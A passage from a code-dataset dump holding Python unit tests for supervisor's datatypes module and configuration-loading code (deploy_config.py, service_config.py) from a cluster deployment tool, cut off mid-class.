datatypes.dict_of_key_value_pairs(\"foo='bar,baz',baz='q,ux'\")\n expected = {'foo': 'bar,baz', 'baz': 'q,ux'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_handles_commas_inside_quotes(self):\n actual = datatypes.dict_of_key_value_pairs('foo=\"bar,baz\",baz=\"q,ux\"')\n expected = {'foo': 'bar,baz', 'baz': 'q,ux'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_handles_unquoted_non_alphanum(self):\n actual = datatypes.dict_of_key_value_pairs(\n 'HOME=/home/auser,FOO=/.foo+(1.2)-_/,'\n 'SUPERVISOR_SERVER_URL=http://127.0.0.1:9001')\n expected = {'HOME': '/home/auser', 'FOO': '/.foo+(1.2)-_/',\n 'SUPERVISOR_SERVER_URL': 'http://127.0.0.1:9001'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_allows_trailing_comma(self):\n actual = datatypes.dict_of_key_value_pairs('foo=bar,')\n expected = {'foo': 'bar'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_raises_value_error_on_too_short(self):\n self.assertRaises(ValueError,\n datatypes.dict_of_key_value_pairs, 'foo')\n self.assertRaises(ValueError,\n datatypes.dict_of_key_value_pairs, 'foo=')\n self.assertRaises(ValueError,\n datatypes.dict_of_key_value_pairs, 'foo=bar,baz')\n self.assertRaises(ValueError,\n datatypes.dict_of_key_value_pairs, 'foo=bar,baz=')\n\n def test_dict_of_key_value_pairs_raises_when_comma_is_missing(self):\n kvp = 'KEY1=no-comma KEY2=ends-with-comma,'\n self.assertRaises(ValueError,\n datatypes.dict_of_key_value_pairs, kvp)\n\n def test_logfile_name_returns_none_for_none_values(self):\n for thing in datatypes.LOGFILE_NONES:\n actual = datatypes.logfile_name(thing)\n self.assertEqual(actual, None)\n\n def test_logfile_name_returns_none_for_uppered_none_values(self):\n for thing in datatypes.LOGFILE_NONES:\n if hasattr(thing, 'upper'):\n thing = thing.upper()\n actual = datatypes.logfile_name(thing)\n self.assertEqual(actual, None)\n\n def test_logfile_name_returns_automatic_for_auto_values(self):\n for thing in datatypes.LOGFILE_AUTOS:\n actual = datatypes.logfile_name(thing)\n self.assertEqual(actual, datatypes.Automatic)\n\n def test_logfile_name_returns_automatic_for_uppered_auto_values(self):\n for thing in datatypes.LOGFILE_AUTOS:\n if hasattr(thing, 'upper'):\n thing = thing.upper()\n actual = datatypes.logfile_name(thing)\n self.assertEqual(actual, datatypes.Automatic)\n\n def test_logfile_name_returns_existing_dirpath_for_other_values(self):\n func = datatypes.existing_dirpath\n datatypes.existing_dirpath = lambda path: path\n try:\n path = '/path/to/logfile/With/Case/Preserved'\n actual = datatypes.logfile_name(path)\n self.assertEqual(actual, path)\n finally:\n datatypes.existing_dirpath = func\n\n def test_integer(self):\n from supervisor.datatypes import integer\n self.assertRaises(ValueError, integer, 'abc')\n self.assertEqual(integer('1'), 1)\n self.assertEqual(integer(str(sys.maxint+1)), sys.maxint+1)\n\n def test_url_accepts_urlparse_recognized_scheme_with_netloc(self):\n good_url = 'http://localhost:9001'\n self.assertEqual(datatypes.url(good_url), good_url)\n\n def test_url_rejects_urlparse_recognized_scheme_but_no_netloc(self):\n bad_url = 'http://'\n self.assertRaises(ValueError, datatypes.url, bad_url)\n\n def test_url_accepts_unix_scheme_with_path(self):\n good_url = \"unix://somepath\"\n self.assertEqual(good_url, datatypes.url(good_url))\n\n def test_url_rejects_unix_scheme_with_no_slashes_or_path(self):\n bad_url = \"unix:\"\n self.assertRaises(ValueError, datatypes.url, bad_url)\n\n def test_url_rejects_unix_scheme_with_slashes_but_no_path(self):\n bad_url = \"unix://\"\n self.assertRaises(ValueError, datatypes.url, bad_url)\n\nclass InetStreamSocketConfigTests(unittest.TestCase):\n def _getTargetClass(self):\n return datatypes.InetStreamSocketConfig\n\n def _makeOne(self, *args, **kw):\n return self._getTargetClass()(*args, **kw)\n\n def test_url(self):\n conf = self._makeOne('127.0.0.1', 8675)\n self.assertEqual(conf.url, 'tcp://127.0.0.1:8675')\n\n def test___str__(self):\n cfg = self._makeOne('localhost', 65531)\n self.assertEqual(str(cfg), 'tcp://localhost:65531')\n\n def test_repr(self):\n conf = self._makeOne('127.0.0.1', 8675)\n s = repr(conf)\n self.assertTrue(s.startswith(\n '<supervisor.datatypes.InetStreamSocketConfig at'), s)\n self.assertTrue(s.endswith('for tcp://127.0.0.1:8675>'), s)\n\n def test_addr(self):\n conf = self._makeOne('127.0.0.1', 8675)\n addr = conf.addr()\n self.assertEqual(addr, ('127.0.0.1', 8675))\n\n def test_port_as_string(self):\n conf = self._makeOne('localhost', '5001')\n addr = conf.addr()\n self.assertEqual(addr, ('localhost', 5001))\n\n def test_create_and_bind(self):\n conf = self._makeOne('127.0.0.1', 8675)\n sock = conf.create_and_bind()\n reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)\n self.assertTrue(reuse)\n self.assertEquals(conf.addr(), sock.getsockname()) #verifies that bind was called\n sock.close()\n\n def test_same_urls_are_equal(self):\n conf1 = self._makeOne('localhost', 5001)\n conf2 = self._makeOne('localhost', 5001)\n self.assertTrue(conf1 == conf2)\n self.assertFalse(conf1 != conf2)\n\n def test_diff_urls_are_not_equal(self):\n conf1 = self._makeOne('localhost', 5001)\n conf2 = self._makeOne('localhost', 5002)\n self.assertTrue(conf1 != conf2)\n self.assertFalse(conf1 == conf2)\n\n def test_diff_objs_are_not_equal(self):\n conf1 = self._makeOne('localhost', 5001)\n conf2 = 'blah'\n self.assertTrue(conf1 != conf2)\n self.assertFalse(conf1 == conf2)\n\nclass UnixStreamSocketConfigTests(unittest.TestCase):\n def _getTargetClass(self):\n return datatypes.UnixStreamSocketConfig\n\n def _makeOne(self, *args, **kw):\n return self._getTargetClass()(*args, **kw)\n\n def test_url(self):\n conf = self._makeOne('/tmp/foo.sock')\n self.assertEqual(conf.url, 'unix:///tmp/foo.sock')\n\n def test___str__(self):\n cfg = self._makeOne('foo/bar')\n self.assertEqual(str(cfg), 'unix://foo/bar')\n\n def test_repr(self):\n conf = self._makeOne('/tmp/foo.sock')\n s = repr(conf)\n self.assertTrue(s.startswith(\n '<supervisor.datatypes.UnixStreamSocketConfig at'), s)\n self.assertTrue(s.endswith('for unix:///tmp/foo.sock>'), s)\n\n def test_get_addr(self):\n conf = self._makeOne('/tmp/foo.sock')\n addr = conf.addr()\n self.assertEqual(addr, '/tmp/foo.sock')\n\n def test_create_and_bind(self):\n (tf_fd, tf_name) = tempfile.mkstemp()\n owner = (sentinel.uid, sentinel.gid)\n mode = sentinel.mode\n conf = self._makeOne(tf_name, owner=owner, mode=mode)\n\n #Patch os.chmod and os.chown functions with mocks\n #objects so that the test does not depend on\n #any specific system users or permissions\n chown_mock = Mock()\n chmod_mock = Mock()\n @patch('os.chown', chown_mock)\n @patch('os.chmod', chmod_mock)\n def call_create_and_bind(conf):\n return conf.create_and_bind()\n\n sock = call_create_and_bind(conf)\n self.assertTrue(os.path.exists(tf_name))\n self.assertEquals(conf.addr(), sock.getsockname()) #verifies that bind was called\n sock.close()\n self.assertTrue(os.path.exists(tf_name))\n os.unlink(tf_name)\n #Verify that os.chown was called with correct args\n self.assertEquals(1, chown_mock.call_count)\n path_arg = chown_mock.call_args[0][0]\n uid_arg = chown_mock.call_args[0][1]\n gid_arg = chown_mock.call_args[0][2]\n self.assertEquals(tf_name, path_arg)\n self.assertEquals(owner[0], uid_arg)\n self.assertEquals(owner[1], gid_arg)\n #Verify that os.chmod was called with correct args\n self.assertEquals(1, chmod_mock.call_count)\n path_arg = chmod_mock.call_args[0][0]\n mode_arg = chmod_mock.call_args[0][1]\n self.assertEquals(tf_name, path_arg)\n self.assertEquals(mode, mode_arg)\n\n def test_same_paths_are_equal(self):\n conf1 = self._makeOne('/tmp/foo.sock')\n conf2 = self._makeOne('/tmp/foo.sock')\n self.assertTrue(conf1 == conf2)\n self.assertFalse(conf1 != conf2)\n\n def test_diff_paths_are_not_equal(self):\n conf1 = self._makeOne('/tmp/foo.sock')\n conf2 = self._makeOne('/tmp/bar.sock')\n self.assertTrue(conf1 != conf2)\n self.assertFalse(conf1 == conf2)\n\n def test_diff_objs_are_not_equal(self):\n conf1 = self._makeOne('/tmp/foo.sock')\n conf2 = 'blah'\n self.assertTrue(conf1 != conf2)\n self.assertFalse(conf1 == conf2)\n\nclass RangeCheckedConversionTests(unittest.TestCase):\n def _getTargetClass(self):\n from supervisor.datatypes import RangeCheckedConversion\n return RangeCheckedConversion\n\n def _makeOne(self, conversion, min=None, max=None):\n return self._getTargetClass()(conversion, min, max)\n\n def test_below_lower_bound(self):\n conversion = self._makeOne(lambda *arg: -1, 0)\n self.assertRaises(ValueError, conversion, None)\n\n def test_above_upper_lower_bound(self):\n conversion = self._makeOne(lambda *arg: 1, 0, 0)\n self.assertRaises(ValueError, conversion, None)\n\n def test_passes(self):\n conversion = self._makeOne(lambda *arg: 0, 0, 0)\n self.assertEqual(conversion(0), 0)\n\nclass InetAddressTests(unittest.TestCase):\n def _callFUT(self, s):\n from supervisor.datatypes import inet_address\n return inet_address(s)\n\n def test_no_port_number(self):\n self.assertRaises(ValueError, self._callFUT, 'a:')\n\n def test_bad_port_number(self):\n self.assertRaises(ValueError, self._callFUT, 'a')\n\n def test_default_host(self):\n host, port = self._callFUT('*:8080')\n self.assertEqual(host, '')\n self.assertEqual(port, 8080)\n\n def test_boring(self):\n host, port = self._callFUT('localhost:80')\n self.assertEqual(host, 'localhost')\n self.assertEqual(port, 80)\n\nclass TestSocketAddress(unittest.TestCase):\n def _getTargetClass(self):\n from supervisor.datatypes import SocketAddress\n return SocketAddress\n\n def _makeOne(self, s):\n return self._getTargetClass()(s)\n\n def test_unix_socket(self):\n import socket\n addr = self._makeOne('/foo/bar')\n self.assertEqual(addr.family, socket.AF_UNIX)\n self.assertEqual(addr.address, '/foo/bar')\n\n def test_inet_socket(self):\n import socket\n addr = self._makeOne('localhost:8080')\n self.assertEqual(addr.family, socket.AF_INET)\n self.assertEqual(addr.address, ('localhost', 8080))\n\nclass TestColonSeparatedUserGroup(unittest.TestCase):\n def _callFUT(self, arg):\n from supervisor.datatypes import colon_separated_user_group\n return colon_separated_user_group(arg)\n\n def test_ok_username(self):\n self.assertEqual(self._callFUT('root')[0], 0)\n\n def test_missinguser_username(self):\n self.assertRaises(ValueError,\n self._callFUT, 'godihopethisuserdoesntexist')\n\n def test_missinguser_username_and_groupname(self):\n self.assertRaises(ValueError,\n self._callFUT, 'godihopethisuserdoesntexist:foo')\n\nclass TestOctalType(unittest.TestCase):\n def _callFUT(self, arg):\n from supervisor.datatypes import octal_type\n return octal_type(arg)\n\n def test_it_success(self):\n self.assertEqual(self._callFUT('10'), 8)\n\n def test_test_it_failure(self):\n self.assertRaises(ValueError, self._callFUT, 'noo')\n"
},
{
"alpha_fraction": 0.6244757771492004,
"alphanum_fraction": 0.6244757771492004,
"avg_line_length": 26.176166534423828,
"blob_id": "3f04370a143c40645806f4af80795b9ab3de85f4",
"content_id": "c2645a12e797fddf70f1740b769319a40955e1ff",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5246,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 193,
"path": "/client/deploy_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import ConfigParser\nimport os\n\nfrom log import Log\n\nDEPLOY_CONFIG = \"../deploy.cfg\"\n\nclass DeployConfig:\n '''\n The deploy config class.\n '''\n def __init__(self, file_name):\n self.config_file = os.path.abspath(file_name)\n self.config_parser = ConfigParser.SafeConfigParser()\n self.config_parser.optionxform = str\n self.config_parser.read([self.config_file])\n\n def get_supervisor_config(self):\n '''\n Get the supervisor config items from the deploy config file.\n '''\n config = {\n 'server_port': self.config_parser.getint('supervisor', 'server_port'),\n 'user': self.config_parser.get('supervisor', 'user'),\n 'password': self.config_parser.get('supervisor', 'password'),\n }\n return config\n\n def get_tank_config(self):\n '''\n Get the tank config items from the deploy config file.\n '''\n config = {\n 'server_host': self.config_parser.get('tank', 'server_host'),\n 'server_port': self.config_parser.getint('tank', 'server_port'),\n }\n return config\n\n def get_config_dir(self):\n '''\n Get the service config file's root directory.\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'config_dir'))\n\n def get_zookeeper_root(self):\n '''\n Get the local zookeeper root directory.\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'zookeeper_root'))\n\n def get_zookeeper_package_dir(self):\n '''\n Get the local zookeeper tarball directory.\n '''\n return '%s/build' % self.get_zookeeper_root()\n\n def get_hadoop_root(self):\n '''\n Get the local hadoop root directory.\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'hadoop_root'))\n\n def get_hadoop_package_dir(self):\n '''\n Get the local hadoop tarball directory.\n '''\n return '%s/hadoop-dist/target' % self.get_hadoop_root()\n\n def get_hbase_root(self):\n '''\n Get the local hbase root directory.\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'hbase_root'))\n\n def get_hbase_package_dir(self):\n '''\n Get the local hbase tarball directory.\n '''\n return '%s/target' % self.get_hbase_root()\n\n def get_impala_root(self):\n '''\n Get the local impala root directory\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'impala_root'))\n\n def get_imapala_package_dir(self):\n '''\n Get the local impala tarball directory\n '''\n return '%s/release' % self.get_impala_root()\n\n def get_kafka_root(self):\n '''\n Get the local kafka root directory\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'kafka_root'))\n\n def get_kafka_package_dir(self):\n '''\n Get the local kafka tarball directory\n '''\n return '%s/release' % self.get_kafka_root()\n\n def get_storm_root(self):\n '''\n Get the local storm root directory\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'storm_root'))\n\n def get_storm_package_dir(self):\n '''\n Get the local storm tarball directory\n '''\n return '%s/storm-dist/binary/target' % self.get_storm_root()\n\n def get_galaxy_root(self):\n '''\n Get the local galaxy root directory\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'galaxy_root'))\n\n def get_galaxy_package_dir(self):\n '''\n Get the local galaxy dist tarball directory\n '''\n return '%s/galaxy-dist/target' % self.get_galaxy_root()\n\n def get_chronos_root(self):\n '''\n Get the local chronos root directory\n '''\n return self._get_real_path(self.config_parser.get(\n 'default', 'chronos_root'))\n\n def get_chronos_package_dir(self):\n '''\n Get the local chronos tarball directory\n '''\n return '%s/target' % self.get_chronos_root()\n\n def get_package_download_root(self):\n '''\n Get the local packages download root directory\n '''\n return \"%s/packages\" % self._get_real_path(\n self.config_parser.get('default', 'minos_home'))\n\n def get_admin_list(self):\n '''\n Get the administrators list.\n '''\n return self.config_parser.get('default', 'admin_list').split(',')\n\n def _get_deploy_root(self):\n return os.path.dirname(self.config_file)\n\n def _get_real_path(self, path):\n if path.startswith('/'):\n return path\n elif path.startswith('~'):\n return os.path.expanduser(path)\n else:\n return os.path.abspath('%s/%s' % (\n self._get_deploy_root(), path))\n\n\ndef get_deploy_config():\n '''\n A factory method to construct the deploy config object.\n '''\n config_file = os.getenv('MINOS_CONFIG_FILE')\n if config_file:\n if not config_file.startswith('/'):\n config_file = '%s/%s' % (os.path.dirname(__file__), config_file)\n else:\n config_file = '%s/%s' % (os.path.dirname(__file__), DEPLOY_CONFIG)\n\n if os.path.exists(config_file):\n return DeployConfig(config_file)\n\n Log.print_critical('Cannot find the config file: deploy.cfg, you should'\n ' specify it by defining the environment variable MINOS_CONFIG_FILE'\n ', or just put the file under the directory: %s' % os.path.dirname(\n os.path.abspath('%s/%s' % (os.path.dirname(__file__), DEPLOY_CONFIG))))\n\n"
},
{
"alpha_fraction": 0.6572996973991394,
"alphanum_fraction": 0.6594584584236145,
"avg_line_length": 38.435787200927734,
"blob_id": "7f2b86cc8f60cd854ea03eca9ef04f4fd746d1fa",
"content_id": "7f3849f273567cd10c8f05391075b565a6ed31e9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27330,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 693,
"path": "/client/service_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport copy\nimport deploy_config\nimport getpass\nimport os\nimport re\nimport socket\nimport subprocess\n\nfrom configobj import ConfigObj\nfrom log import Log\nfrom supervisor_client import SupervisorClient\n\nBASEPORT_INTERVAL = 10\n\ndef get_real_instance_id(instance_id):\n if instance_id == -1:\n return 0\n else:\n return instance_id\n\ndef get_base_port(base_port, instance_id):\n return base_port + BASEPORT_INTERVAL * get_real_instance_id(instance_id)\n\ndef parse_task_number(task_id, hosts):\n found_task = False\n instance_id = int(task_id)\n\n for host_id, host in hosts.iteritems():\n if instance_id + 1 > host.instance_num:\n instance_id -= host.instance_num\n else:\n found_task = True\n break\n if found_task == False:\n raise ValueError(str(task_id) + ' is not a valid task of cluster, please check your config')\n return host_id, instance_id\n\ndef get_port_addition_result(args, cluster, jobs, parsing_service, current_job,\n host_id, instance_id, val):\n reg_expr = JOB_PORT_EXPR_REGEX.match(val)\n job_name = reg_expr.group('job')\n add_num = int(reg_expr.group('num'))\n return get_base_port(jobs[job_name].base_port, instance_id) + add_num\n\ndef get_job_task_port_addition_result(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = JOB_TASK_PORT_EXPR_REGEX.match(val)\n job_name = reg_expr.group('job')\n task_id = reg_expr.group('task')\n add_num = int(reg_expr.group('num'))\n host_id, instance_id = parse_task_number(task_id, jobs[job_name].hosts)\n return get_base_port(jobs[job_name].base_port, instance_id) + add_num\n\ndef get_service_job_task_port_addition_result(args, cluster, jobs,\n parsing_service, current_job, host_id, instance_id, val):\n reg_expr = SERVICE_JOB_TASK_PORT_EXPR_REGEX.match(val)\n service = reg_expr.group('service')\n job_name = reg_expr.group('job')\n task_id = reg_expr.group('task')\n add_num = int(reg_expr.group('num'))\n\n service_config = get_service_config(args, service, cluster)\n host_id, instance_id = parse_task_number(task_id,\n service_config.jobs[job_name].hosts)\n return get_base_port(service_config.jobs[job_name].base_port, instance_id) + add_num\n\ndef get_service_cluster_name(service, cluster):\n if service == \"zookeeper\":\n return cluster.zk_cluster\n elif service == \"hdfs\":\n hdfs_cluster = cluster.hdfs_cluster\n if hdfs_cluster != cluster.name:\n return hdfs_cluster\n else:\n return cluster.name\n elif service == \"hbase\":\n hbase_cluster = cluster.hbase_cluster\n if hbase_cluster != cluster.name:\n return hbase_cluster\n else:\n return cluster.name\n elif service == \"yarn\":\n yarn_cluster = cluster.yarn_cluster\n if yarn_cluster != cluster.name:\n return yarn_cluster\n else:\n return cluster.name\n\ndef get_service_config(args, service, cluster):\n get_short_user_name(args)\n\n if not getattr(args, service + \"_config\", None):\n service_args = argparse.Namespace()\n service_args.service = service\n service_args.cluster = get_service_cluster_name(service, cluster)\n setattr(args, service + \"_config\", ServiceConfig(service_args))\n return getattr(args, service + \"_config\")\n\ndef get_zk_job(args, cluster):\n zk_config = get_service_config(args, \"zookeeper\", cluster)\n return zk_config.jobs[\"zookeeper\"]\n\ndef get_zk_hosts(args, cluster, jobs, current_job, host_id):\n zk_job = get_zk_job(args, cluster)\n return \",\".join([\"%s\" % (host.ip) for host in zk_job.hosts.itervalues()])\n\ndef get_job_host_port_list(job):\n host_port_list = []\n for host in job.hosts.itervalues():\n for instance_id in range(host.instance_num):\n host_port_list.append(\"%s:%d\" % (\n host.ip, get_base_port(job.base_port, instance_id)))\n return host_port_list\n\ndef get_zk_hosts_with_port(args, cluster, jobs, current_job, host_id):\n zk_job = get_zk_job(args, cluster)\n host_port_list = get_job_host_port_list(zk_job)\n return \",\".join(host_port_list)\n\ndef get_slots_ports_list(args, cluster, jobs, current_job, host_id):\n slot_port = jobs[\"supervisor\"].base_port + 10\n slot_number = int(\n args.storm_config.configuration.generated_files['storm.yaml']['slot_number'])\n\n slots_ports_list = []\n for port_index in range(slot_number):\n slots_ports_list.append(str(slot_port + port_index))\n return ','.join(slots_ports_list)\n\ndef get_journalnode_hosts_with_port(args, cluster, jobs, current_job, host_id):\n hdfs_config = get_service_config(args, \"hdfs\", cluster)\n jour_job = hdfs_config.jobs[\"journalnode\"]\n host_port_list = get_job_host_port_list(jour_job)\n return \";\".join(host_port_list)\n\ndef get_zk_server_list(args, cluster, jobs, current_job, host_id):\n server_list = str()\n job = jobs[jobs.keys()[0]]\n hosts = job.hosts\n for host_id, host in hosts.iteritems():\n for instance_id in range(host.instance_num):\n server_list += (\"server.%d=%s:%d:%d\\n\" %\n (host_id * host.instance_num + instance_id, host.ip,\n get_base_port(job.base_port, instance_id) + 2,\n get_base_port(job.base_port, instance_id) + 3))\n return server_list\n\ndef get_supervisor_client(host, service, cluster_name, job, instance_id):\n supervisor_config = deploy_config.get_deploy_config().get_supervisor_config()\n return SupervisorClient(host, supervisor_config.get('server_port'),\n supervisor_config.get('user'), supervisor_config.get('password'),\n service, cluster_name, job, instance_id)\n\ndef get_config_dir(args=None, cluster=None, jobs=None, current_job=\"\", host_id=0):\n return deploy_config.get_deploy_config().get_config_dir()\n\ndef get_short_user_name(args, cluster=None, jobs=None, current_job=\"\", host_id=0):\n if not getattr(args, \"short_user_name\", None):\n args.short_user_name = get_short_user_name_full()[1]\n return args.short_user_name\n\ndef get_remote_user(args, cluster, jobs, current_job, host_id):\n return args.remote_user\n\ndef get_current_host(args, cluster, jobs, current_job, host_id):\n return jobs[current_job].hosts[host_id].ip\n\ndef get_hadoop_conf_path(args, cluster, jobs, current_job, host_id):\n return \"/etc/hadoop/conf\"\n\ndef get_config_path(args):\n return \"%s/conf/%s/%s-%s.cfg\" % (get_config_dir(),\n args.service, args.service, args.cluster)\n\ndef get_short_user_name_full():\n try:\n cmd = ['klist']\n output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT,)\n\n centos_line_prefix = 'Default principal:'\n macos_line_prefix = 'Principal:'\n for line in output.split('\\n'):\n if (line.strip().startswith(centos_line_prefix) or\n line.strip().startswith(macos_line_prefix)):\n return True, line.split(':')[1].split('@')[0].strip()\n except:\n return False, getpass.getuser()\n\ndef get_specific_dir(host, service, cluster_name, job_name, instance_id, attribute):\n supervisor_client = get_supervisor_client(\n host, service, cluster_name, job_name, instance_id)\n\n if attribute == \"data_dir\":\n return supervisor_client.get_available_data_dirs()[0]\n elif attribute == \"data_dirs\":\n return \",\".join(supervisor_client.get_available_data_dirs())\n elif attribute == \"run_dir\":\n return supervisor_client.get_run_dir()\n elif attribute == \"log_dir\":\n return supervisor_client.get_log_dir()\n elif attribute == \"current_package_dir\":\n return supervisor_client.get_current_package_dir()\n\ndef get_service_cluster_attribute(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = SERVICE_CLUSTER_ATTRIBUTE_REGEX.match(val)\n service = reg_expr.group('service')\n attribute = reg_expr.group('attribute')\n service_config = get_service_config(args, service, cluster)\n return getattr(service_config.cluster, attribute)\n\ndef get_service_job_task_attribute(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = SERVICE_JOB_TASK_ATTRIBUTE_REGEX.match(val)\n service = reg_expr.group('service')\n job_name = reg_expr.group('job')\n task_id = reg_expr.group('task')\n attribute = reg_expr.group('attribute')\n service_config = get_service_config(args, service, cluster)\n host_id, instance_id = parse_task_number(task_id,\n service_config.jobs[job_name].hosts)\n if attribute == 'host':\n return service_config.jobs[job_name].hosts[host_id].ip\n elif attribute == 'base_port':\n return get_base_port(service_config.jobs[job_name].base_port, instance_id)\n\ndef get_job_task_attribute(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = JOB_TASK_ATTRIBUTE_REGEX.match(val)\n job_name = reg_expr.group('job')\n task_id = reg_expr.group('task')\n attribute = reg_expr.group('attribute')\n host_id, instance_id = parse_task_number(task_id, jobs[job_name].hosts)\n if attribute == 'host':\n return jobs[job_name].hosts[host_id].ip\n elif attribute == 'base_port':\n return get_base_port(jobs[job_name].base_port, instance_id)\n\ndef get_job_host_attribute(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = JOB_HOST_ATTRIBUTE_REGEX.match(val)\n job_name = reg_expr.group('job')\n attribute = reg_expr.group('attribute')\n if not getattr(jobs[job_name].hosts[host_id], attribute, None):\n Log.print_critical(\"The attribute %s of %s--%s is not configured.\" \\\n \" Please check your configuration.\" % (\n attribute, job_name, jobs[job_name].hosts[host_id].ip))\n\n return getattr(jobs[job_name].hosts[host_id], attribute)\n\ndef get_section_attribute(args, cluster, jobs, parsing_service,\n current_job, host_id, instance_id, val):\n reg_expr = SECTION_ATTRIBUTE_REGEX.match(val)\n section = reg_expr.group('section')\n attribute = reg_expr.group('attribute')\n\n if section == \"cluster\":\n return getattr(cluster, attribute)\n else:\n section_instance_id = instance_id\n if attribute == \"base_port\":\n return get_base_port(jobs[section].base_port, section_instance_id)\n else:\n if current_job == section:\n host = jobs[section].hosts[host_id]\n else: # prevent index over boundary when host_id mapping another job\n host = jobs[section].hosts[0]\n # the parsing section may not be the job which is being started or bootstrapped,\n # so call get_specific_dir according to the section_instance_id.\n if host.instance_num == 1:\n section_instance_id = -1\n return get_specific_dir(host.ip, parsing_service, cluster.name,\n section, section_instance_id, attribute)\n\n\nCLUSTER_NAME_REGEX = re.compile(r'((?P<zk>[a-z0-9]+)-)?([a-z0-9]+)')\nHOST_RULE_REGEX = re.compile(r'host\\.(?P<id>\\d+)')\nVARIABLE_REGEX = re.compile('%\\{(.+?)\\}')\n\nSECTION_ATTRIBUTE_REGEX = re.compile('(?P<section>(?!zk\\.)\\w+)\\.(?P<attribute>\\w+)$')\nJOB_PORT_EXPR_REGEX = re.compile('(?P<job>\\w+)\\.base_port[+-](?P<num>\\d+)')\nJOB_TASK_ATTRIBUTE_REGEX = re.compile('(?P<job>\\w+)\\.(?P<task>\\d+)\\.(?P<attribute>\\w+)$')\nJOB_TASK_PORT_EXPR_REGEX = re.compile('(?P<job>\\w+)\\.(?P<task>\\d+)\\.base_port[+-](?P<num>\\d+)')\nJOB_HOST_ATTRIBUTE_REGEX = re.compile('(?P<job>\\w+)\\.host\\.(?P<attribute>\\w+)$')\nSERVICE_CLUSTER_ATTRIBUTE_REGEX = re.compile('(?P<service>\\w+)\\.cluster\\.(?P<attribute>\\w+)$')\nSERVICE_JOB_TASK_ATTRIBUTE_REGEX = re.compile('(?P<service>\\w+)\\.(?P<job>\\w+)\\.(?P<task>\\d+)\\.(?P<attribute>\\w+)$')\nSERVICE_JOB_TASK_PORT_EXPR_REGEX = re.compile('(?P<service>\\w+)\\.(?P<job>\\w+)\\.(?P<task>\\d+)\\.base_port[+-](?P<num>\\d+)')\n\nSCHEMA_MAP = {\n JOB_PORT_EXPR_REGEX : get_port_addition_result,\n SECTION_ATTRIBUTE_REGEX : get_section_attribute,\n JOB_TASK_ATTRIBUTE_REGEX : get_job_task_attribute,\n JOB_TASK_PORT_EXPR_REGEX : get_job_task_port_addition_result,\n JOB_HOST_ATTRIBUTE_REGEX : get_job_host_attribute,\n SERVICE_CLUSTER_ATTRIBUTE_REGEX : get_service_cluster_attribute,\n SERVICE_JOB_TASK_ATTRIBUTE_REGEX : get_service_job_task_attribute,\n SERVICE_JOB_TASK_PORT_EXPR_REGEX : get_service_job_task_port_addition_result,\n \"zk.hosts\" : get_zk_hosts,\n \"zk.hosts_with_port\" : get_zk_hosts_with_port,\n \"slots_ports_list\" : get_slots_ports_list,\n \"journalnode_task_list\" : get_journalnode_hosts_with_port,\n \"server_list\" : get_zk_server_list,\n \"config_dir\" : get_config_dir,\n \"short_user_name\" : get_short_user_name,\n \"remote_user\" : get_remote_user,\n \"current_host\" : get_current_host,\n \"hadoop_conf_path\" : get_hadoop_conf_path,\n # \"slaves\" : \"\\n\".join(jobs[\"datanode\"].hosts.values()),\n}\n\nCOMMON_JOB_SCHEMA = {\n # \"param_name\": (type, default_value)\n # type must be in {bool, int, float, str}\n # if default_value is None, it means it's NOT an optional parameter.\n \"base_port\": (int, None),\n}\n\nCLUSTER_SCHEMA = {\n \"name\": (str, None),\n \"version\": (str, None),\n \"jobs\": (str, None),\n \"kerberos_realm\": (str, \"XIAOMI.NET\"),\n \"kerberos_username\": (str, \"\"),\n \"ganglia_address\" : (str, \"\"),\n \"package_name\": (str, \"\"),\n \"revision\": (str, \"\"),\n \"timestamp\": (str, \"\"),\n \"hdfs_cluster\": (str, \"\"),\n \"hbase_cluster\": (str, \"\"),\n \"yarn_cluster\": (str, \"\"),\n \"log_level\": (str, \"info\"),\n}\n\nMULTIPLE_INSTANCES_JOBS = [\"datanode\", \"regionserver\", \"nodemanager\", \"historyserver\", \"impalad\"]\nARGUMENTS_TYPE_LIST = [\"jvm_args\", \"system_properties\", \"main_entry\", \"extra_args\"]\nHEAP_MEMORY_SETTING_LIST = [\"-Xmx\", \"-Xms\", \"-Xmn\", \"-Xss\"]\n\nclass ServiceConfig:\n '''\n The class represents the configuration of a service.\n '''\n def __init__(self, args):\n self.service = args.service\n self.config_dict_full = self.get_config_dict_full(\n get_config_path(args))\n\n self.cluster_dict = self.config_dict_full[\"cluster\"]\n self.configuration_dict = self.config_dict_full[\"configuration\"]\n self.arguments_dict = self.config_dict_full[\"arguments\"]\n\n self.cluster = ServiceConfig.Cluster(self.cluster_dict, args.cluster)\n self.jobs = {}\n for job_name in self.cluster.jobs:\n self.jobs[job_name] = ServiceConfig.Jobs(\n self.config_dict_full[job_name], job_name)\n self.configuration = ServiceConfig.Configuration(\n self.configuration_dict, args, self.cluster, self.jobs)\n\n class Cluster:\n '''\n The class represents a service cluster\n '''\n def __init__(self, cluster_dict, 